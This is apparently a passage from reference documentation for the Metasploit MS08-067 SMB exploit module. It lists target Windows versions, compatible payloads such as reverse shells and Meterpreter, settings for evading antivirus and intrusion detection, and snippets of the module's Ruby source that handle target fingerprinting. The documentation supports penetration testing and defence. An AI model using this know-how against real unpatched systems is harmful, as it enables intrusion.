   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the windows/smb/ms08_067_netapi module can exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    payload/windows/adduser                                                      normal  No     Windows Execute net user /ADD
   6    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   7    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   8    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   9    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   10   payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   11   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   12   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   13   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   16   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   17   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   18   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   19   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   20   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   21   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   22   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   23   payload/windows/exec                                                         normal  No     Windows Execute Command
   24   payload/windows/format_all_drives                                            manual  No     Windows Drive Formatter
   25   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   26   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   27   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   28   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   29   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   30   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   31   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   32   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   33   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   34   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   35   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   36   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   37   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   38   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   39   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   40   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   41   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   42   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   43   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   44   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   45   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   46   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   47   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   48   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   49   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   50   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   51   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   52   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   53   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   54   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   55   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   56   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   57   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   58   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   59   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   60   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   61   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   62   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   63   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   64   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   65   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   66   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   67   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   68   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   69   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   70   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   71   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   72   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   73   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   74   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   75   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   76   payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   77   payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   78   payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   79   payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   80   payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   81   payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   82   payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   83   payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   84   payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   85   payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   86   payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   87   payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   88   payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   89   payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   90   payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   91   payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   92   payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   93   payload/windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   94   payload/windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   95   payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   96   payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   97   payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   98   payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   99   payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   100  payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   101  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   102  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   103  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   104  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   105  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   106  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   107  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   108  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   109  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   110  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   111  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   112  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   113  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   114  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   115  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   116  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   117  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   118  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   119  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   120  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   121  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   122  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   123  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   124  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   125  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   126  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   127  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   128  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   129  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   130  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   131  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   132  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   133  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   134  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   135  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   136  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   137  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   138  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   139  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   140  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   141  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   142  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   143  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   144  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   145  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   146  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   147  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   148  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support

Evasion Options

Here is the full list of possible evasion options supported by the windows/smb/ms08_067_netapi exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/smb/ms08_067_netapi) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
   SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
   SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
   SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
   SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
   SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
   SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
   SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

  • Connection reset during login
  • This most likely means a previous exploit attempt caused the service to crash
  • No matching target
  • Could not determine the exact service pack
  • Auto-targeting failed, use ‘show targets’ to manually select one
  • We could not detect the language pack, defaulting to English
  • No matching target
  • Connection failed: <E.CLASS>: <E>
  • Connection reset during login
  • This most likely means a previous exploit attempt caused the service to crash
  • SMB error: <E.MESSAGE>
  • System is not vulnerable (status: 0x%08x)
  • Unable to locate key: «<E>»

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection reset during login

Here is a relevant code snippet related to the «Connection reset during login» error message:

841:	    begin
842:	      connect(versions: [1])
843:	      smb_login
844:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
845:	      if e.message =~ /Connection reset/
846:	        print_error('Connection reset during login')
847:	        print_error('This most likely means a previous exploit attempt caused the service to crash')
848:	        return
849:	      else
850:	        raise e
851:	      end

This most likely means a previous exploit attempt caused the service to crash

Here is a relevant code snippet related to the «This most likely means a previous exploit attempt caused the service to crash» error message:

842:	      connect(versions: [1])
843:	      smb_login
844:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
845:	      if e.message =~ /Connection reset/
846:	        print_error('Connection reset during login')
847:	        print_error('This most likely means a previous exploit attempt caused the service to crash')
848:	        return
849:	      else
850:	        raise e
851:	      end
852:	    end

No matching target

Here is a relevant code snippet related to the «No matching target» error message:

863:	
864:	      print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
865:	
866:	      # Bail early on unknown OS
867:	      if (fprint['os'] == 'Unknown')
868:	        fail_with(Failure::NoTarget, 'No matching target')
869:	      end
870:	
871:	      # Windows 2000 is mostly universal
872:	      if (fprint['os'] == 'Windows 2000')
873:	        mytarget = targets[1]

Could not determine the exact service pack

Here is a relevant code snippet related to the «Could not determine the exact service pack» error message:

888:	        fprint['os'] = 'Windows 2003'
889:	      end
890:	
891:	      # Service Pack match must be exact
892:	      if (not mytarget) and fprint['sp'].index('+')
893:	        print_error('Could not determine the exact service pack')
894:	        print_error("Auto-targeting failed, use 'show targets' to manually select one")
895:	        disconnect
896:	        return
897:	      end
898:

Auto-targeting failed, use ‘show targets’ to manually select one

Here is a relevant code snippet related to the «Auto-targeting failed, use ‘show targets’ to manually select one» error message:

889:	      end
890:	
891:	      # Service Pack match must be exact
892:	      if (not mytarget) and fprint['sp'].index('+')
893:	        print_error('Could not determine the exact service pack')
894:	        print_error("Auto-targeting failed, use 'show targets' to manually select one")
895:	        disconnect
896:	        return
897:	      end
898:	
899:	      # Language Pack match must be exact or we default to English

We could not detect the language pack, defaulting to English

Here is a relevant code snippet related to the «We could not detect the language pack, defaulting to English» error message:

896:	        return
897:	      end
898:	
899:	      # Language Pack match must be exact or we default to English
900:	      if (not mytarget) and fprint['lang'] == 'Unknown'
901:	        print_status('We could not detect the language pack, defaulting to English')
902:	        fprint['lang'] = 'English'
903:	      end
904:	
905:	      # Normalize the service pack string
906:	      fprint['sp'].gsub!(/Service Packs+/, 'SP')

No matching target

Here is a relevant code snippet related to the «No matching target» error message:

918:	          end
919:	        end
920:	      end
921:	
922:	      unless mytarget
923:	        fail_with(Failure::NoTarget, 'No matching target')
924:	      end
925:	
926:	      print_status("Selected Target: #{mytarget.name}")
927:	    end
928:

Connection failed: <E.CLASS>: <E>

Here is a relevant code snippet related to the «Connection failed: <E.CLASS>: <E>» error message:

1087:	  def check
1088:	    begin
1089:	      connect(versions: [1])
1090:	      smb_login
1091:	    rescue Rex::ConnectionError => e
1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')

Connection reset during login

Here is a relevant code snippet related to the «Connection reset during login» error message:

1091:	    rescue Rex::ConnectionError => e
1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
1098:	        return Msf::Exploit::CheckCode::Unknown
1099:	      else
1100:	        raise e
1101:	      end

This most likely means a previous exploit attempt caused the service to crash

Here is a relevant code snippet related to the «This most likely means a previous exploit attempt caused the service to crash» error message:

1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
1098:	        return Msf::Exploit::CheckCode::Unknown
1099:	      else
1100:	        raise e
1101:	      end
1102:	    end

SMB error: <E.MESSAGE>

Here is a relevant code snippet related to the «SMB error: <E.MESSAGE>» error message:

1121:	
1122:	    begin
1123:	      # Samba doesn't have this handle and returns an ErrorCode
1124:	      dcerpc_bind(handle)
1125:	    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
1126:	      vprint_error("SMB error: #{e.message}")
1127:	      return Msf::Exploit::CheckCode::Safe
1128:	    end
1129:	
1130:	    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
1131:

System is not vulnerable (status: 0x%08x)

Here is a relevant code snippet related to the «System is not vulnerable (status: 0x%08x)» error message:

